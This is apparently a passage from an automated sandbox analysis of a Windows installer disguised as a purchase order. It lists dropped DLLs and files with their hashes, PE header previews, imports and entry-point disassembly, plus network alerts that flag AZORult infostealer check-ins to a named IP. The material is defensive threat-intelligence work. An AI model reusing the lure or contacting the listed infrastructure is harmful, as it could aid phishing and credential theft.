                            SSDEEP:24576:XDI7I4/FeoJQuQ3IhXtHfjyqgJ0BnPQAib7/12bg2JSna5xfg0867U4MSpu731hn:uQ3YX5jyqgynPkbd24VwMSpu7Fhn
                            MD5:556EA09421A0F74D31C4C0A89A70DC23
                            SHA1:F739BA9B548EE64B13EB434A3130406D23F836E3
                            SHA-256:F0E6210D4A0D48C7908D8D1C270449C91EB4523E312A61256833BFEAF699ABFB
                            SHA-512:2481FC80DFFA8922569552C3C3EBAEF8D0341B80427447A14B291EC39EA62AB9C05A75E85EEF5EA7F857488CAB1463C18586F9B076E2958C5A314E459045EDE2
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 4%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........x..c+..c+..c+...+..c++.b*..c+lh.+..c++.`*..c++.f*..c++.g*..c+.b*..c+9.b*..c+..b+..c+9.k*..c+9.g*C.c+9.c*..c+9..+..c+9.a*..c+Rich..c+................PE..L...a..Z.........."!................T........................................@............@.............................d....<..T.......h.......................t~..0...T...............................@............................................text............................... ..`.rdata...P.......R..................@..@.data....E...`... ...:..............@....rsrc...h............Z..............@..@.reloc..t~...........^..............@..B................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):92624
                            Entropy (8bit):6.639368309935547
                            Encrypted:false
                            SSDEEP:1536:5vNGVOt0VjOJkbH8femxfRVMNKBDuOQWL1421GlkxERC+ANcFZoZ/6tNRCwI41ZH:hNGVOiBZbcGmxXMcBqmzoCUZoZebHZMw
                            MD5:569A7A65658A46F9412BDFA04F86E2B2
                            SHA1:44CC0038E891AE73C43B61A71A46C97F98B1030D
                            SHA-256:541A293C450E609810279F121A5E9DFA4E924D52E8B0C6C543512B5026EFE7EC
                            SHA-512:C027B9D06C627026774195D3EAB72BD245EBBF5521CB769A4205E989B07CB4687993A47061FF6343E6EC1C059C3EC19664B52ED3A1100E6A78CFFB1C46472AFB
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Z.Y.4.Y.4.Y.4.P...U.4...5.[.4..y.Q.4...7.X.4...1.S.4...0.R.4.{.5.[.4...5.Z.4.Y.5...4...0.A.4...4.X.4....X.4...6.X.4.RichY.4.........................PE..L......Z.........."!.........0...............0............................................@..........................?.......@.......`..p............L.......p.......:..T...........................(;..@............0..X............................text............................... ..`.rdata..4....0... ..................@..@.data........P.......>..............@....rsrc...p....`.......@..............@..@.reloc.......p.......D..............@..B................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):144336
                            Entropy (8bit):6.5527585854849395
                            Encrypted:false
                            SSDEEP:3072:zAf6suip+z7FEk/oJz69sFaXeu9CoT2nIZvetBWqIBoE9Mv:Q6PpsF4CoT2EeY2eMv
                            MD5:67827DB2380B5848166A411BAE9F0632
                            SHA1:F68F1096C5A3F7B90824AA0F7B9DA372228363FF
                            SHA-256:9A7F11C212D61856DFC494DE111911B7A6D9D5E9795B0B70BBBC998896F068AE
                            SHA-512:910E15FD39B48CD13427526FDB702135A7164E1748A7EACCD6716BCB64B978FE333AC26FA8EBA73ED33BD32F2330D5C343FCD3F0FE2FFD7DF54DB89052DB7148
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L......Z.........."!.........`...............................................P......+Z....@..........................................0..p....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...C.......D..................@..@.data........ ......................@....rsrc...p....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):1142072
                            Entropy (8bit):6.809041027525523
                            Encrypted:false
                            SSDEEP:24576:bZBmnrh2YVAPROs7Bt/tX+/APcmcvIZPoy4TbK:FBmF2lIeaAPgb
                            MD5:D6326267AE77655F312D2287903DB4D3
                            SHA1:1268BEF8E2CA6EBC5FB974FDFAFF13BE5BA7574F
                            SHA-256:0BB8C77DE80ACF9C43DE59A8FD75E611CC3EB8200C69F11E94389E8AF2CEB7A9
                            SHA-512:11DB71D286E9DF01CB05ACEF0E639C307EFA3FEF8442E5A762407101640AC95F20BAD58F0A21A4DF7DBCDA268F934B996D9906434BF7E575C4382281028F64D4
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........E..............o........p..................................................................Rich............................PE..L....3............!.....Z...........=.......p...............................p............@A........................`................................0..8=......$... ...T...........................H...@............................................text....Z.......Z.................. ..`.data........p.......^..............@....idata..6............l..............@..@.rsrc...............................@..@.reloc..$...........................@..B........................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):83784
                            Entropy (8bit):6.890347360270656
                            Encrypted:false
                            SSDEEP:1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
                            MD5:7587BF9CB4147022CD5681B015183046
                            SHA1:F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
                            SHA-256:C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
                            SHA-512:0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:modified
                            Size (bytes):11776
                            Entropy (8bit):5.659384359264642
                            Encrypted:false
                            SSDEEP:192:ex24sihno00Wfl97nH6BenXwWobpWBTtvShJ5omi7dJWjOlESlS:h8QIl972eXqlWBFSt273YOlEz
                            MD5:8B3830B9DBF87F84DDD3B26645FED3A0
                            SHA1:223BEF1F19E644A610A0877D01EADC9E28299509
                            SHA-256:F004C568D305CD95EDBD704166FCD2849D395B595DFF814BCC2012693527AC37
                            SHA-512:D13CFD98DB5CA8DC9C15723EEE0E7454975078A776BCE26247228BE4603A0217E166058EBADC68090AFE988862B7514CB8CB84DE13B3DE35737412A6F0A8AC03
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L.....uY...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..`....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):3296
                            Entropy (8bit):3.4113461059426067
                            Encrypted:false
                            SSDEEP:96:rLAi578zFA1TbATYHGzrSCICl2Pih5A9EE9EaiFy:fP57nlATYHyrSV5S5AfZ
                            MD5:419178A0AA370FC69EFC1A54202CBFAC
                            SHA1:BCACA6EB056D92BF2E4ABACCA16ACD80CA055BE6
                            SHA-256:9C5948468DD8ADA15A36D7A1F7F5BC9563B7C7602A9BFB3CDC1B70F40C67DE36
                            SHA-512:93FFD54400BBECD18D7EE69116364DDC2075E34294B9769880C53DB6DF3B0837A3E0590B0584EB3B79882BD66D8D9451E9014D33D8AD61C246E1EFDA65971BF8
                            Malicious:false
                            Preview:..[.T.r.a.n.s.l.a.t.i.o.n.s.].....R.O.G. .X.G. .M.o.b.i.l.e. .p.l.u.g.g.e.d.-.i.n. .=.R.O.G. .X.G. .M.o.b.i.l.e. ...r. .a.n.s.l.u.t.e.n.....P.u.s.h. .t.h.e. .".U.n.l.o.c.k. .S.w.i.t.c.h.". .o.n. .t.o.p. .o.f. .t.h.e. .p.l.u.g. .t.o. .l.o.c.k. .y.o.u.r. .c.a.b.l.e. .i.n. .p.l.a.c.e...=.T.r.y.c.k. .p... .l...s.k.n.a.p.p.e.n. .o.v.a.n.f...r. .k.o.n.t.a.k.t.e.n. .f...r. .a.t.t. .l...s.a. .f.a.s.t. .k.a.b.e.l.n.......D.o.n.'.t. .s.h.o.w. .t.h.i.s. .m.e.s.s.a.g.e. .a.g.a.i.n.=.V.i.s.a. .i.n.t.e. .d.e.t. .h...r. .m.e.d.d.e.l.a.n.d.e.t. .i.g.e.n.....O.K.=.O.K.....C.a.n.c.e.l.=.A.v.b.r.y.t.....A.c.t.i.v.a.t.e. .t.h.e. .R.O.G. .X.G. .M.o.b.i.l.e.=.A.k.t.i.v.e.r.a. .R.O.G. .X.G. .M.o.b.i.l.e.....D.e.a.c.t.i.v.a.t.e. .t.h.e. .R.O.G. .X.G. .M.o.b.i.l.e.=.I.n.a.k.t.i.v.e.r.a. .R.O.G. .X.G. .M.o.b.i.l.e.....C.l.i.c.k. .O.K. .t.o. .s.w.i.t.c.h. .t.o. .t.h.e. .R.O.G. .X.G. .M.o.b.i.l.e...=.K.l.i.c.k.a. .p... .O.K. .f...r. .a.t.t. .b.y.t.a. .t.i.l.l. .R.O.G. .X.G. .M.o.b.i.l.e.......C.l.i.c.k. .O.K. .t.
                            Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                            File Type:Java JCE KeyStore
                            Category:dropped
                            Size (bytes):163026
                            Entropy (8bit):6.663116548350503
                            Encrypted:false
                            SSDEEP:3072:i33VZ54T8JgMEU0pR3e6aahDHuP0IXt0dQ4SUy:OVZ54HMJCRO6RFFNL9y
                            MD5:DD964C96ACC8FC51404B2205E7E740BD
                            SHA1:81396D8F7BC367620BB127671CC324F63730B05F
                            SHA-256:B42CF7F21B859E1C5D2ACE876913738A979DBF5FE9D4F5BAFFDFF60A0577FCE3
                            SHA-512:6554D0BB128D204FD434D7E04C23DCEE55DD4DA8EE08433D54B8DF7690C9F3A8FF284A7F7023F889ABA798582BFC665E612958DD2D85374F37D3F82FF73C765E
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):100097
                            Entropy (8bit):7.998148981940183
                            Encrypted:true
                            SSDEEP:1536:iHaaOtGX0NzHwQMkIhF5kPtF/c2xo10IKCxvEYiCOw3u3ASAlNs9LHLpKvnO8:pryszHOhbWplCOE0uGLHLcm8
                            MD5:115DDC0D007BC8ACA7678133CDF5B024
                            SHA1:EED3949E406842152A374530E8971C52CB68ED8A
                            SHA-256:17EABBA40E488BE3A65E30F5ABFA82F4C1E119C3EF484C2C39E9C95E993CA248
                            SHA-512:622B9CD498B1AE71457CFC3094667077A5281BC1FEAA04789FC8F2B3FE641EF3F205D6DBE900E18C9A555866DD1FD00A6080827653225FA45AE9C1300C66244C
                            Malicious:false
                            Preview:2=..g.e.S......2..H>m........k........)_.q.6.R..B....~:....Eh.7.8q."..CE.5..)e.e"..^.Z..d8#..n0...7....K......)Z.8."..L...9.b.KQ?.)U.8.euF.....&........./...bQ.N...0.t.,.....YT...?0...H..E. .v.po.+....{.U.E..#......@7\.(.[+..K1...#....|.......b.@../I7...S.......X...2.dx.l..:..xtR...h..|9.+e..&....0...l8-..!.....Gw;0l...j.L`..L.^.%..G..U....e.Y..t.7.X...4^k.G......'S..?..7.&.,...j...<r..OU G.A=.`.h.~....)..1..o..|.Y.X...:...A.}...1.[{.]S...y....sE.:....c..~.Z&6V........`...%..)gm.fc.`...8.!.."._.Q....Rmrw*&..V..~.p.:..0......AF...U..%*=>S]{....8..o.9.a.........0_.a.b.X....{....=m....k......._M.......0..JG...r.._+3h....B..ECC.Q..0......e...6.8.....o{!.........P'g..WZx.....2GC!k._..p}:..1l.?mX..iP<=..Z.d..7.3.X...... *`.H.9.....@yY..Q'..|H3..q......-....].....C../..s..|.......h.z.E....IA...URZ.*.=..H.;..+#....g.........$...y..EN}.@...Q.Y#.0GL..U)F6..`.(...+.O......e%....h..V...5..s.D.|p:.....i.W.;.x....?..,.....lv*\.a....|.G..."..K..!P.n..
                            Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):106536
                            Entropy (8bit):6.014036571306393
                            Encrypted:false
                            SSDEEP:1536:Uu0DxbI1QwdCVQiZSGMwd1v9gL2ZJeIAsW1IEd09dllZ05PD/tbXZJ+NPE1H:URxIawUGiZ7M6VgLMII4JM50PbXiNPMH
                            MD5:93FBA0E88958082664890BA74C8463E3
                            SHA1:11C4F155494FB93232719AF3BA173EAC6F781CD8
                            SHA-256:5C8B1D73B57905CB0024B6B00136363BEEF051ED8E1F0EFC7BC72F565AF06175
                            SHA-512:6A13C83F5176FF78E16E98CFD155C5263CD2E1CFD1E00FABF13B8E85D426A4437F92D17559691FE149CDD7376AEF8573E0167B1BDECF999E31FC665412A86B20
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........y.k.*.k.*.k.*...+.k.*...+.k.*...+%k.*...+.k.*...+.k.*...+.k.*...+.k.*.k.*.k.*...+.k.*...+.k.*..i*.k.*.k.*.k.*...+.k.*Rich.k.*........PE..d....8.a.........." ......................................................................`..........................................[..|....\..(....... .......4....~..("......X...XF..p............................F..8...............(............................text............................... ..`.rdata..n...........................@..@.data...h....p.......R..............@....pdata..4............^..............@..@_RDATA...............n..............@..@.rsrc... ............p..............@..@.reloc..X............v..............@..B................................................................................................................................................................................................
                            Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):16824
                            Entropy (8bit):6.421949257045276
                            Encrypted:false
                            SSDEEP:192:fvcU3c5wjYguwJba7RXAQV01eSKMP7x0KDWpH4AAANa3JZHSVMyMt:fvVkeYpwJKRn61jKMNvDG/GhqMys
                            MD5:2D75C46C8030F312DFC2F56A0E016692
                            SHA1:F95F12C987AF20A69BA05088B2F9E4F4BEC445AE
                            SHA-256:AADD6DE734D7585D23833BA5C303313ED2273B2BD3D1B4B7BA55ABC1366FD8DD
                            SHA-512:C0F0F07E6BA4A6676B753EC3613AC388DE88F32D508CB1B9BD8521FBF192889232B4722756DDC72A46B0AC4A4BFB48F26E06651E64CF3D31EB8F82134A5D3671
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...&.#b.........."!................P........................................p.......g....@A................................(!..P....P...............".......`..4.... ............................... ...............!..h............................text............................... ..`.rdata..$.... ......................@..@.data........0......................@....00cfg.......@......................@..@.rsrc........P......................@..@.reloc..4....`....... ..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                            File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                            Category:dropped
                            Size (bytes):840
                            Entropy (8bit):3.3700691322951384
                            Encrypted:false
                            SSDEEP:12:8wl01Rm/3BVkUnDyXdICRDufdpUPu7dI5ST5D0TL6CNbw4t2YCBTo8:8S/BTD3YDuL3I50B2bIJT
                            MD5:FCFA8E3FCF1A0053D44C9D269EB41E40
                            SHA1:3558529A9DB458F029D784E56ABC8F7F94666D2E
                            SHA-256:DBF2655D8984EDF18B4B9CBD4AA7C42F4A2AEFDABAA594819704D8212EF22435
                            SHA-512:40F7A8A90F6AE01DA1BFDC7BF656C94E3F52695E2EFF8FBCEF110724C6D545342D8634D06A06BEEEF8A15B5DABBC6C750611EAE95D511EE9ACB75FC287A56782
                            Malicious:false
                            Preview:L..................F........................................................=....P.O. .:i.....+00.../C:\...................V.1...........Windows.@............................................W.i.n.d.o.w.s.....P.1...........Fonts.<............................................F.o.n.t.s.....h.2...........Tolknings.Fin.L............................................T.o.l.k.n.i.n.g.s...F.i.n...........\.F.o.n.t.s.\.T.o.l.k.n.i.n.g.s...F.i.n.c.C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.O.v.e.r.f.u.r.n.i.s.h.e.d.\.T.u.b.e.r.c.u.l.i.s.a.t.i.o.n.\.W.o.o.d.w.o.s.e.\.C.i.r.c.u.l.a.r.i.z.a.t.i.o.n.s.1.2.6.\.I.l.t.n.i.n.g.e.r.n.e.s.\.M.e.l.l.i.v.o.r.o.u.s.........$..................C..B..g..(.#................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.4.2.5.3.1.6.5.6.7.-.2.9.6.9.5.8.8.3.8.2.-.3.7.7.8.2.2.2.4.1.4.-.1.0.0.1.................
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                            Entropy (8bit):7.575298268219731
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:PO No. 3200005919.exe
                            File size:373461
                            MD5:9453cdcf8221341d06bac47b8ab3aa19
                            SHA1:c35a23cdc61eb42594e1a39a23ccae06399263c0
                            SHA256:7490acc48d1659234d61c1716c0d549880a98375f502502b60dcc71b49f7f14f
                            SHA512:d37774b11400256fb4fe21b1e298f90274b0c83f2b0f90bc7c5d2a6ed3e0edb276bc49df8f65b0099f1d0ce6c4abac277805adf590971e277d1c1e15fd1190cd
                            SSDEEP:6144:8Iw37uc96d+riI5FhrmKugnyj/wFW+hy88BSFz0PALceeozAs9k:pld6f5Ftgayj/kW+hyRYBVce3k5
                            TLSH:2F84BF2F711D505ED917353266AEF0AA2B597C8B2B71E8164BA37DDF94F07200A0FB02
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....uY.................d...*.....
                            Icon Hash:e0f0f0d0d8c0f81e
                            Entrypoint:0x403489
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Time Stamp:0x5975952E [Mon Jul 24 06:35:26 2017 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:1f23f452093b5c1ff091a2f9fb4fa3e9
                            Instruction
                            sub esp, 000002D4h
                            push ebx
                            push esi
                            push edi
                            push 00000020h
                            pop edi
                            xor ebx, ebx
                            push 00008001h
                            mov dword ptr [esp+14h], ebx
                            mov dword ptr [esp+10h], 0040A230h
                            mov dword ptr [esp+1Ch], ebx
                            call dword ptr [004080ACh]
                            call dword ptr [004080A8h]
                            and eax, BFFFFFFFh
                            cmp ax, 00000006h
                            mov dword ptr [0042A24Ch], eax
                            je 00007F8370619723h
                            push ebx
                            call 00007F837061C9D1h
                            cmp eax, ebx
                            je 00007F8370619719h
                            push 00000C00h
                            call eax
                            mov esi, 004082B0h
                            push esi
                            call 00007F837061C94Bh
                            push esi
                            call dword ptr [00408150h]
                            lea esi, dword ptr [esi+eax+01h]
                            cmp byte ptr [esi], 00000000h
                            jne 00007F83706196FCh
                            push 0000000Ah
                            call 00007F837061C9A4h
                            push 00000008h
                            call 00007F837061C99Dh
                            push 00000006h
                            mov dword ptr [0042A244h], eax
                            call 00007F837061C991h
                            cmp eax, ebx
                            je 00007F8370619721h
                            push 0000001Eh
                            call eax
                            test eax, eax
                            je 00007F8370619719h
                            or byte ptr [0042A24Fh], 00000040h
                            push ebp
                            call dword ptr [00408044h]
                            push ebx
                            call dword ptr [004082A0h]
                            mov dword ptr [0042A318h], eax
                            push ebx
                            lea eax, dword ptr [esp+34h]
                            push 000002B4h
                            push eax
                            push ebx
                            push 004216E8h
                            call dword ptr [00408188h]
                            push 0040A384h
                            Programming Language:
                            • [EXP] VC++ 6.0 SP5 build 8804
                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x600000x10890.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000x63d10x6400False0.66515625data6.479451209065IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rdata0x80000x138e0x1400False0.45data5.143831732151552IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .data0xa0000x203580x600False0.501953125data4.000739070159718IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .ndata0x2b0000x350000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc0x600000x108900x10a00False0.19385867011278196data3.7626047476334135IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            NameRVASizeTypeLanguageCountry
                            RT_BITMAP0x603e80x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States
                            RT_ICON0x607500x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States
                            RT_ICON0x65bd80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States
                            RT_ICON0x69e000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States
                            RT_ICON0x6c3a80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States
                            RT_ICON0x6d4500xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States
                            RT_ICON0x6e2f80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States
                            RT_ICON0x6ec800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States
                            RT_ICON0x6f5280x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States
                            RT_ICON0x6fa900x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States
                            RT_DIALOG0x6fef80x144dataEnglishUnited States
                            RT_DIALOG0x700400x13cdataEnglishUnited States
                            RT_DIALOG0x701800x100dataEnglishUnited States
                            RT_DIALOG0x702800x11cdataEnglishUnited States
                            RT_DIALOG0x703a00xc4dataEnglishUnited States
                            RT_DIALOG0x704680x60dataEnglishUnited States
                            RT_GROUP_ICON0x704c80x84dataEnglishUnited States
                            RT_MANIFEST0x705500x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States
                            DLLImport
                            KERNEL32.dllExitProcess, SetFileAttributesW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, SetCurrentDirectoryW, GetFileAttributesW, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, GetShortPathNameW, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalUnlock, GetDiskFreeSpaceW, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                            USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                            GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                            SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                            ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                            COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                            ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                            Language of compilation systemCountry where language is spokenMap
                            EnglishUnited States
                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                            192.168.11.20104.21.2.649830802029468 11/28/22-16:37:02.608409TCP2029468ET TROJAN Win32/AZORult V3.3 Client Checkin M154983080192.168.11.20104.21.2.6
                            104.21.2.6192.168.11.2080498302029137 11/28/22-16:37:03.671390TCP2029137ET TROJAN AZORult v3.3 Server Response M28049830104.21.2.6192.168.11.20
                            TimestampSource PortDest PortSource IPDest IP
                            Nov 28, 2022 16:37:02.208327055 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.258344889 CET804982986.109.170.4192.168.11.20
                            Nov 28, 2022 16:37:02.258560896 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.259182930 CET4982980192.168.11.2086.109.170.4
                            Nov 28, 2022 16:37:02.309118986 CET804982986.109.170.4192.168.11.20
